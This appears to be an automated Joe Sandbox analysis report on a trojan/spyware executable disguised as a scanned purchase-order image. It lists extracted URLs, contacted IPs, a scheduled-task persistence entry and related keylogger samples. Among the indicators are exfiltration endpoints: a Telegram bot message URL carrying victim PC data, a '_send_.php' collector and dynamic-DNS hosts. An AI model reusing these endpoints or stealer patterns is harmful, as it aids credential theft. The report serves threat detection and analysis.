                                                http://varders.kozow.com:8081Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe, 00000000.00000002.1733478686.0000000004A46000.00000004.00000800.00020000.00000000.sdmp, Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe, 00000006.00000002.4132369730.0000000002D01000.00000004.00000800.00020000.00000000.sdmp, HJnkiZjAPsec.exe, 00000008.00000002.1781171636.00000000046A7000.00000004.00000800.00020000.00000000.sdmp, HJnkiZjAPsec.exe, 0000000B.00000002.4132447999.0000000002BA1000.00000004.00000800.00020000.00000000.sdmp, HJnkiZjAPsec.exe, 0000000B.00000002.4128482963.0000000000432000.00000040.00000400.00020000.00000000.sdmpfalse
                                                  		unknown
                                                  http://www.sajatypeworks.comScan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe, 00000000.00000002.1736661600.0000000007352000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  • URL Reputation: safe
                                                  		unknown
                                                  http://mail.kafs.co.ugScan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe, 00000006.00000002.4132369730.0000000002E09000.00000004.00000800.00020000.00000000.sdmp, Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe, 00000006.00000002.4132369730.0000000002E8D000.00000004.00000800.00020000.00000000.sdmp, HJnkiZjAPsec.exe, 0000000B.00000002.4132447999.0000000002D2E000.00000004.00000800.00020000.00000000.sdmp, HJnkiZjAPsec.exe, 0000000B.00000002.4132447999.0000000002CAB000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    		unknown
                                                    http://www.typography.netDScan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe, 00000000.00000002.1736661600.0000000007352000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    • URL Reputation: safe
                                                    		unknown
                                                    http://www.founder.com.cn/cn/cTheScan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe, 00000000.00000002.1736661600.0000000007352000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    • URL Reputation: safe
                                                    		unknown
                                                    http://www.galapagosdesign.com/staff/dennis.htmScan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe, 00000000.00000002.1736661600.0000000007352000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    • URL Reputation: safe
                                                    		unknown
                                                    http://x1.c.lencr.org/0Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe, 00000006.00000002.4130484840.0000000000EBC000.00000004.00000020.00020000.00000000.sdmp, Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe, 00000006.00000002.4132369730.0000000002E91000.00000004.00000800.00020000.00000000.sdmp, Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe, 00000006.00000002.4144722830.0000000006328000.00000004.00000020.00020000.00000000.sdmp, HJnkiZjAPsec.exe, 0000000B.00000002.4145363700.000000000628D000.00000004.00000020.00020000.00000000.sdmp, HJnkiZjAPsec.exe, 0000000B.00000002.4129499108.0000000000F3A000.00000004.00000020.00020000.00000000.sdmp, HJnkiZjAPsec.exe, 0000000B.00000002.4132447999.0000000002D32000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    • URL Reputation: safe
                                                    		unknown
                                                    http://x1.i.lencr.org/0Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe, 00000006.00000002.4130484840.0000000000EBC000.00000004.00000020.00020000.00000000.sdmp, Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe, 00000006.00000002.4132369730.0000000002E91000.00000004.00000800.00020000.00000000.sdmp, Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe, 00000006.00000002.4144722830.0000000006328000.00000004.00000020.00020000.00000000.sdmp, HJnkiZjAPsec.exe, 0000000B.00000002.4145363700.000000000628D000.00000004.00000020.00020000.00000000.sdmp, HJnkiZjAPsec.exe, 0000000B.00000002.4129499108.0000000000F3A000.00000004.00000020.00020000.00000000.sdmp, HJnkiZjAPsec.exe, 0000000B.00000002.4132447999.0000000002D32000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    • URL Reputation: safe
                                                    		unknown
                                                    https://reallyfreegeoip.org/xml/173.254.250.81$Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe, 00000006.00000002.4132369730.0000000002DC0000.00000004.00000800.00020000.00000000.sdmp, Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe, 00000006.00000002.4132369730.0000000002D7A000.00000004.00000800.00020000.00000000.sdmp, Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe, 00000006.00000002.4132369730.0000000002DE6000.00000004.00000800.00020000.00000000.sdmp, HJnkiZjAPsec.exe, 0000000B.00000002.4132447999.0000000002C5F000.00000004.00000800.00020000.00000000.sdmp, HJnkiZjAPsec.exe, 0000000B.00000002.4132447999.0000000002C87000.00000004.00000800.00020000.00000000.sdmp, HJnkiZjAPsec.exe, 0000000B.00000002.4132447999.0000000002C1A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      		unknown
                                                      https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17InstallScan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe, 00000006.00000002.4140455092.0000000003F88000.00000004.00000800.00020000.00000000.sdmp, Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe, 00000006.00000002.4140455092.0000000003DE4000.00000004.00000800.00020000.00000000.sdmp, Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe, 00000006.00000002.4140455092.0000000003F5D000.00000004.00000800.00020000.00000000.sdmp, Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe, 00000006.00000002.4140455092.0000000003DB9000.00000004.00000800.00020000.00000000.sdmp, Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe, 00000006.00000002.4140455092.0000000003E2E000.00000004.00000800.00020000.00000000.sdmp, Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe, 00000006.00000002.4140455092.0000000004081000.00000004.00000800.00020000.00000000.sdmp, HJnkiZjAPsec.exe, 0000000B.00000002.4140715633.0000000003DFD000.00000004.00000800.00020000.00000000.sdmp, HJnkiZjAPsec.exe, 0000000B.00000002.4140715633.0000000003E28000.00000004.00000800.00020000.00000000.sdmp, HJnkiZjAPsec.exe, 0000000B.00000002.4140715633.0000000003C59000.00000004.00000800.00020000.00000000.sdmp, HJnkiZjAPsec.exe, 0000000B.00000002.4140715633.0000000003F20000.00000004.00000800.00020000.00000000.sdmp, HJnkiZjAPsec.exe, 0000000B.00000002.4140715633.0000000003CCE000.00000004.00000800.00020000.00000000.sdmp, HJnkiZjAPsec.exe, 0000000B.00000002.4140715633.0000000003C84000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      • URL Reputation: safe
                                                      		unknown
                                                      http://checkip.dyndns.org/qScan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe, 00000000.00000002.1733478686.0000000004A46000.00000004.00000800.00020000.00000000.sdmp, HJnkiZjAPsec.exe, 00000008.00000002.1781171636.00000000046A7000.00000004.00000800.00020000.00000000.sdmp, HJnkiZjAPsec.exe, 0000000B.00000002.4128482963.0000000000432000.00000040.00000400.00020000.00000000.sdmpfalse
                                                      • URL Reputation: safe
                                                      		unknown
                                                      https://chrome.google.com/webstore?hl=enlBScan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe, 00000006.00000002.4132369730.0000000002EBE000.00000004.00000800.00020000.00000000.sdmp, HJnkiZjAPsec.exe, 0000000B.00000002.4132447999.0000000002D5F000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        		unknown
                                                        http://www.galapagosdesign.com/DPleaseScan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe, 00000000.00000002.1736661600.0000000007352000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        • URL Reputation: safe
                                                        		unknown
                                                        http://www.fonts.comScan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe, 00000000.00000002.1736661600.0000000007352000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        • URL Reputation: safe
                                                        		unknown
                                                        http://www.sandoll.co.krScan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe, 00000000.00000002.1736661600.0000000007352000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        • URL Reputation: safe
                                                        		unknown
                                                        http://www.urwpp.deDPleaseScan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe, 00000000.00000002.1736661600.0000000007352000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        • URL Reputation: safe
                                                        		unknown
                                                        http://www.zhongyicts.com.cnScan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe, 00000000.00000002.1736661600.0000000007352000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        • URL Reputation: safe
                                                        		unknown
                                                        http://mail.kafs.co.ugdScan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe, 00000006.00000002.4132369730.0000000002E09000.00000004.00000800.00020000.00000000.sdmp, Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe, 00000006.00000002.4132369730.0000000002E8D000.00000004.00000800.00020000.00000000.sdmp, HJnkiZjAPsec.exe, 0000000B.00000002.4132447999.0000000002D2E000.00000004.00000800.00020000.00000000.sdmp, HJnkiZjAPsec.exe, 0000000B.00000002.4132447999.0000000002CAB000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          		unknown
                                                          http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameScan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe, 00000000.00000002.1732669565.0000000003490000.00000004.00000800.00020000.00000000.sdmp, Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe, 00000006.00000002.4132369730.0000000002D01000.00000004.00000800.00020000.00000000.sdmp, HJnkiZjAPsec.exe, 00000008.00000002.1779228796.0000000002E60000.00000004.00000800.00020000.00000000.sdmp, HJnkiZjAPsec.exe, 0000000B.00000002.4132447999.0000000002BA1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          • URL Reputation: safe
                                                          		unknown
                                                          http://www.sakkal.comScan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe, 00000000.00000002.1736661600.0000000007352000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          • URL Reputation: safe
                                                          		unknown
                                                          http://r11.i.lencr.org/0#Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe, 00000006.00000002.4129429491.0000000000E06000.00000004.00000020.00020000.00000000.sdmp, Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe, 00000006.00000002.4132369730.0000000002E91000.00000004.00000800.00020000.00000000.sdmp, Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe, 00000006.00000002.4144722830.0000000006328000.00000004.00000020.00020000.00000000.sdmp, HJnkiZjAPsec.exe, 0000000B.00000002.4145363700.000000000628D000.00000004.00000020.00020000.00000000.sdmp, HJnkiZjAPsec.exe, 0000000B.00000002.4129499108.0000000000F3A000.00000004.00000020.00020000.00000000.sdmp, HJnkiZjAPsec.exe, 0000000B.00000002.4132447999.0000000002D32000.00000004.00000800.00020000.00000000.sdmpfalse
                                                            		unknown
                                                            https://reallyfreegeoip.org/xml/Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe, 00000000.00000002.1733478686.0000000004A46000.00000004.00000800.00020000.00000000.sdmp, Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe, 00000006.00000002.4132369730.0000000002D50000.00000004.00000800.00020000.00000000.sdmp, HJnkiZjAPsec.exe, 00000008.00000002.1781171636.00000000046A7000.00000004.00000800.00020000.00000000.sdmp, HJnkiZjAPsec.exe, 0000000B.00000002.4132447999.0000000002BF0000.00000004.00000800.00020000.00000000.sdmp, HJnkiZjAPsec.exe, 0000000B.00000002.4128482963.0000000000432000.00000040.00000400.00020000.00000000.sdmpfalse
                                                            • URL Reputation: safe
                                                            		unknown
                                                            https://www.office.com/HJnkiZjAPsec.exe, 0000000B.00000002.4132447999.0000000002D95000.00000004.00000800.00020000.00000000.sdmp, HJnkiZjAPsec.exe, 0000000B.00000002.4132447999.0000000002CAB000.00000004.00000800.00020000.00000000.sdmp, HJnkiZjAPsec.exe, 0000000B.00000002.4132447999.0000000002D86000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              		unknown
                                                              http://www.apache.org/licenses/LICENSE-2.0Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe, 00000000.00000002.1736661600.0000000007352000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                		unknown
                                                                http://www.fontbureau.comScan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe, 00000000.00000002.1736661600.0000000007352000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                • URL Reputation: safe
                                                                		unknown
                                                                http://r11.o.lencr.org0#Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe, 00000006.00000002.4129429491.0000000000E06000.00000004.00000020.00020000.00000000.sdmp, Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe, 00000006.00000002.4132369730.0000000002E91000.00000004.00000800.00020000.00000000.sdmp, Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe, 00000006.00000002.4144722830.0000000006328000.00000004.00000020.00020000.00000000.sdmp, HJnkiZjAPsec.exe, 0000000B.00000002.4145363700.000000000628D000.00000004.00000020.00020000.00000000.sdmp, HJnkiZjAPsec.exe, 0000000B.00000002.4129499108.0000000000F3A000.00000004.00000020.00020000.00000000.sdmp, HJnkiZjAPsec.exe, 0000000B.00000002.4132447999.0000000002D32000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                  		unknown
                                                                  https://chrome.google.com/webstore?hl=enHScan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe, 00000006.00000002.4132369730.0000000002EB4000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                    		unknown
                                                                    http://checkip.dyndns.orgScan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe, 00000006.00000002.4132369730.0000000002D01000.00000004.00000800.00020000.00000000.sdmp, HJnkiZjAPsec.exe, 0000000B.00000002.4132447999.0000000002BA1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                    • URL Reputation: safe
                                                                    		unknown
                                                                    https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe, 00000006.00000002.4140455092.0000000003E2C000.00000004.00000800.00020000.00000000.sdmp, Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe, 00000006.00000002.4140455092.00000000040A5000.00000004.00000800.00020000.00000000.sdmp, Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe, 00000006.00000002.4132369730.0000000002E09000.00000004.00000800.00020000.00000000.sdmp, Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe, 00000006.00000002.4140455092.0000000003F82000.00000004.00000800.00020000.00000000.sdmp, Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe, 00000006.00000002.4140455092.0000000003E53000.00000004.00000800.00020000.00000000.sdmp, Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe, 00000006.00000002.4140455092.0000000003FD0000.00000004.00000800.00020000.00000000.sdmp, Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe, 00000006.00000002.4140455092.0000000003DDE000.00000004.00000800.00020000.00000000.sdmp, HJnkiZjAPsec.exe, 0000000B.00000002.4140715633.0000000003C7E000.00000004.00000800.00020000.00000000.sdmp, HJnkiZjAPsec.exe, 0000000B.00000002.4140715633.0000000003E22000.00000004.00000800.00020000.00000000.sdmp, HJnkiZjAPsec.exe, 0000000B.00000002.4140715633.0000000003CCC000.00000004.00000800.00020000.00000000.sdmp, HJnkiZjAPsec.exe, 0000000B.00000002.4132447999.0000000002CAB000.00000004.00000800.00020000.00000000.sdmp, HJnkiZjAPsec.exe, 0000000B.00000002.4140715633.0000000003F45000.00000004.00000800.00020000.00000000.sdmp, HJnkiZjAPsec.exe, 0000000B.00000002.4140715633.0000000003CF3000.00000004.00000800.00020000.00000000.sdmp, HJnkiZjAPsec.exe, 0000000B.00000002.4140715633.0000000003E70000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                    • URL Reputation: safe
                                                                    		unknown
                                                                    https://api.telegram.org/bot/sendMessage?chat_id=&text=Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe, 00000006.00000002.4132369730.0000000002DE6000.00000004.00000800.00020000.00000000.sdmp, HJnkiZjAPsec.exe, 0000000B.00000002.4132447999.0000000002C87000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                      		unknown
                                                                      https://www.chiark.greenend.org.uk/~sgtatham/putty/0Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe, HJnkiZjAPsec.exe.0.drfalse
                                                                      • URL Reputation: safe
                                                                      		unknown
                                                                      http://www.carterandcone.comlScan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe, 00000000.00000002.1736661600.0000000007352000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                      • URL Reputation: safe
                                                                      		unknown
                                                                      http://aborters.duckdns.org:8081Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe, 00000000.00000002.1733478686.0000000004A46000.00000004.00000800.00020000.00000000.sdmp, Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe, 00000006.00000002.4132369730.0000000002D01000.00000004.00000800.00020000.00000000.sdmp, HJnkiZjAPsec.exe, 00000008.00000002.1781171636.00000000046A7000.00000004.00000800.00020000.00000000.sdmp, HJnkiZjAPsec.exe, 0000000B.00000002.4132447999.0000000002BA1000.00000004.00000800.00020000.00000000.sdmp, HJnkiZjAPsec.exe, 0000000B.00000002.4128482963.0000000000432000.00000040.00000400.00020000.00000000.sdmpfalse
                                                                        		unknown
                                                                        http://www.fontbureau.com/designers/cabarga.htmlNScan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe, 00000000.00000002.1736661600.0000000007352000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                        • URL Reputation: safe
                                                                        		unknown
                                                                        http://www.founder.com.cn/cnScan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe, 00000000.00000002.1736661600.0000000007352000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                        • URL Reputation: safe
                                                                        		unknown
                                                                        http://www.fontbureau.com/designers/frere-user.htmlScan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe, 00000000.00000002.1736661600.0000000007352000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                        • URL Reputation: safe
                                                                        		unknown
                                                                        http://51.38.247.67:8081/_send_.php?LScan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe, 00000006.00000002.4132369730.0000000002E09000.00000004.00000800.00020000.00000000.sdmp, HJnkiZjAPsec.exe, 0000000B.00000002.4132447999.0000000002CAB000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                          		unknown
                                                                          http://anotherarmy.dns.army:8081Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe, 00000000.00000002.1733478686.0000000004A46000.00000004.00000800.00020000.00000000.sdmp, Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe, 00000006.00000002.4132369730.0000000002D01000.00000004.00000800.00020000.00000000.sdmp, HJnkiZjAPsec.exe, 00000008.00000002.1781171636.00000000046A7000.00000004.00000800.00020000.00000000.sdmp, HJnkiZjAPsec.exe, 0000000B.00000002.4132447999.0000000002BA1000.00000004.00000800.00020000.00000000.sdmp, HJnkiZjAPsec.exe, 0000000B.00000002.4128482963.0000000000432000.00000040.00000400.00020000.00000000.sdmpfalse
                                                                            		unknown
                                                                            http://www.jiyu-kobo.co.jp/Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe, 00000000.00000002.1736661600.0000000007352000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                            • URL Reputation: safe
                                                                            		unknown
                                                                            https://reallyfreegeoip.orgScan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe, 00000006.00000002.4132369730.0000000002D50000.00000004.00000800.00020000.00000000.sdmp, Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe, 00000006.00000002.4132369730.0000000002DC0000.00000004.00000800.00020000.00000000.sdmp, Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe, 00000006.00000002.4132369730.0000000002DE6000.00000004.00000800.00020000.00000000.sdmp, HJnkiZjAPsec.exe, 0000000B.00000002.4132447999.0000000002C5F000.00000004.00000800.00020000.00000000.sdmp, HJnkiZjAPsec.exe, 0000000B.00000002.4132447999.0000000002BF0000.00000004.00000800.00020000.00000000.sdmp, HJnkiZjAPsec.exe, 0000000B.00000002.4132447999.0000000002C87000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                            • URL Reputation: safe
                                                                            		unknown
                                                                            http://www.fontbureau.com/designers8Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe, 00000000.00000002.1736661600.0000000007352000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                            • URL Reputation: safe
                                                                            		unknown
                                                                            https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:927537%0D%0ADate%20aScan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe, 00000006.00000002.4132369730.0000000002DE6000.00000004.00000800.00020000.00000000.sdmp, HJnkiZjAPsec.exe, 0000000B.00000002.4132447999.0000000002C87000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                              		unknown
                                                                              https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016ExamplesScan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe, 00000006.00000002.4140455092.0000000003F88000.00000004.00000800.00020000.00000000.sdmp, Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe, 00000006.00000002.4140455092.0000000003DE4000.00000004.00000800.00020000.00000000.sdmp, Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe, 00000006.00000002.4140455092.0000000003F5D000.00000004.00000800.00020000.00000000.sdmp, Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe, 00000006.00000002.4140455092.0000000003DB9000.00000004.00000800.00020000.00000000.sdmp, Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe, 00000006.00000002.4140455092.0000000003E2E000.00000004.00000800.00020000.00000000.sdmp, Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe, 00000006.00000002.4140455092.0000000004081000.00000004.00000800.00020000.00000000.sdmp, HJnkiZjAPsec.exe, 0000000B.00000002.4140715633.0000000003DFD000.00000004.00000800.00020000.00000000.sdmp, HJnkiZjAPsec.exe, 0000000B.00000002.4140715633.0000000003E28000.00000004.00000800.00020000.00000000.sdmp, HJnkiZjAPsec.exe, 0000000B.00000002.4140715633.0000000003C59000.00000004.00000800.00020000.00000000.sdmp, HJnkiZjAPsec.exe, 0000000B.00000002.4140715633.0000000003F20000.00000004.00000800.00020000.00000000.sdmp, HJnkiZjAPsec.exe, 0000000B.00000002.4140715633.0000000003CCE000.00000004.00000800.00020000.00000000.sdmp, HJnkiZjAPsec.exe, 0000000B.00000002.4140715633.0000000003C84000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                              • URL Reputation: safe
                                                                              		unknown
                                                                              http://kafs.co.ugdScan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe, 00000006.00000002.4132369730.0000000002E09000.00000004.00000800.00020000.00000000.sdmp, Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe, 00000006.00000002.4132369730.0000000002E8D000.00000004.00000800.00020000.00000000.sdmp, HJnkiZjAPsec.exe, 0000000B.00000002.4132447999.0000000002D2E000.00000004.00000800.00020000.00000000.sdmp, HJnkiZjAPsec.exe, 0000000B.00000002.4132447999.0000000002CAB000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                		unknown
                                                                                http://51.38.247.67:8081/_send_.php?LCapplication/x-www-form-urlencodedScan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe, 00000000.00000002.1733478686.0000000004A46000.00000004.00000800.00020000.00000000.sdmp, HJnkiZjAPsec.exe, 00000008.00000002.1781171636.00000000046A7000.00000004.00000800.00020000.00000000.sdmp, HJnkiZjAPsec.exe, 0000000B.00000002.4128482963.0000000000432000.00000040.00000400.00020000.00000000.sdmpfalse
                                                                                  		unknown

                                                                                  World Map of Contacted IPs

                                                                                  • No. of IPs < 25%
                                                                                  • 25% < No. of IPs < 50%
                                                                                  • 50% < No. of IPs < 75%
                                                                                  • 75% < No. of IPs

                                                                                  Public IPs

                                                                                  IPDomainCountryFlagASNASN NameMalicious
                                                                                  149.154.167.220
                                                                                  		api.telegram.orgUnited Kingdom
                                                                                  		62041TELEGRAMRUtrue
                                                                                  188.114.97.3
                                                                                  		reallyfreegeoip.orgEuropean Union
                                                                                  		13335CLOUDFLARENETUStrue
                                                                                  193.122.130.0
                                                                                  		checkip.dyndns.comUnited States
                                                                                  		31898ORACLE-BMC-31898USfalse
                                                                                  104.243.33.38
                                                                                  		kafs.co.ugUnited States
                                                                                  		23470RELIABLESITEUStrue

                                                                                  General Information

                                                                                  Joe Sandbox version:41.0.0 Charoite
                                                                                  Analysis ID:1541880
                                                                                  Start date and time:2024-10-25 09:17:07 +02:00
                                                                                  Joe Sandbox product:CloudBasic
                                                                                  Overall analysis duration:0h 10m 2s
                                                                                  Hypervisor based Inspection enabled:false
                                                                                  Report type:full
                                                                                  Cookbook file name:default.jbs
                                                                                  Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                  Number of analysed new started processes analysed:16
                                                                                  Number of new started drivers analysed:0
                                                                                  Number of existing processes analysed:0
                                                                                  Number of existing drivers analysed:0
                                                                                  Number of injected processes analysed:0
                                                                                  Technologies:
                                                                                  • HCA enabled
                                                                                  • EGA enabled
                                                                                  • AMSI enabled
                                                                                  Analysis Mode:default
                                                                                  Analysis stop reason:Timeout
                                                                                  Sample name:Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe
                                                                                  Detection:MAL
                                                                                  Classification:mal100.troj.spyw.evad.winEXE@16/11@4/4
                                                                                  EGA Information:
                                                                                  • Successful, ratio: 100%
                                                                                  HCA Information:
                                                                                  • Successful, ratio: 99%
                                                                                  • Number of executed functions: 261
                                                                                  • Number of non-executed functions: 18
                                                                                  Cookbook Comments:
                                                                                  • Found application associated with file extension: .exe
                                                                                  • Override analysis time to 240000 for current running targets taking high CPU consumption

                                                                                  Warnings

                                                                                  • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
                                                                                  • Excluded domains from analysis (whitelisted): fs.microsoft.com, ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                                                  • Not all processes where analyzed, report is missing behavior information
                                                                                  • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                  • Report size getting too big, too many NtCreateKey calls found.
                                                                                  • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                  • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                  • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                  • Report size getting too big, too many NtReadVirtualMemory calls found.
                                                                                  • VT rate limit hit for: Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe

                                                                                  Simulations

                                                                                  Behavior and APIs

                                                                                  TimeTypeDescription
                                                                                  03:17:59API Interceptor8337836x Sleep call for process: Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe modified
                                                                                  03:18:01API Interceptor17x Sleep call for process: powershell.exe modified
                                                                                  03:18:05API Interceptor6072911x Sleep call for process: HJnkiZjAPsec.exe modified
                                                                                  08:18:03Task SchedulerRun new task: HJnkiZjAPsec path: C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exe

                                                                                  Joe Sandbox View / Context

                                                                                  IPs

                                                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                  149.154.167.220Quote1.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                                                    g1TLK7mbZD.imgGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                      Purchase Order.exeGet hashmaliciousMassLogger RATBrowse
                                                                                        kQyd2z80gD.exeGet hashmaliciousDCRatBrowse
                                                                                          REVISED INVOICE.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                            Produccion.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                              226999705-124613-sanlccjavap0004-67.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                BT-036016002U_RFQ 014-010-02024.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                  RFQ_64182MR_PDF.R00.vbsGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                    Circular_no_088_Annexure_pdf.htmlGet hashmaliciousHTMLPhisherBrowse
                                                                                                      188.114.97.3https://is.gd/6NgVrQGet hashmaliciousHTMLPhisherBrowse
                                                                                                      • aa.opencompanies.co.uk/vEXJm/
                                                                                                      Comprobante de pago.xlam.xlsxGet hashmaliciousUnknownBrowse
                                                                                                      • paste.ee/d/KXy1F
                                                                                                      01YP9Lwum8.exeGet hashmaliciousDCRatBrowse
                                                                                                      • 77777cm.nyashtyan.in/externalpipejsprocessAuthapiDbtrackWordpressCdn.php
                                                                                                      PO-000041522.exeGet hashmaliciousFormBookBrowse
